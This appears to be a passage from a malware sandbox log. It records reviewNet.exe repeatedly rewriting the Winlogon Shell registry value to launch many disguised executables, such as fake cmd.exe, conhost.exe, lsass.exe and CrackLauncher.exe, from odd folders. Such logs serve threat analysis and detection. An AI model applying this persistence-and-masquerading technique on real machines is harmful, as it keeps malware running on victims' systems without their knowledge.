\"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\", \"C:\\Users\\All Users\\Application Data\\cmd.exe\", \"C:\\ComsurrogateServerdll\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\", \"C:\\Users\\All Users\\Application Data\\cmd.exe\", \"C:\\ComsurrogateServerdll\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", 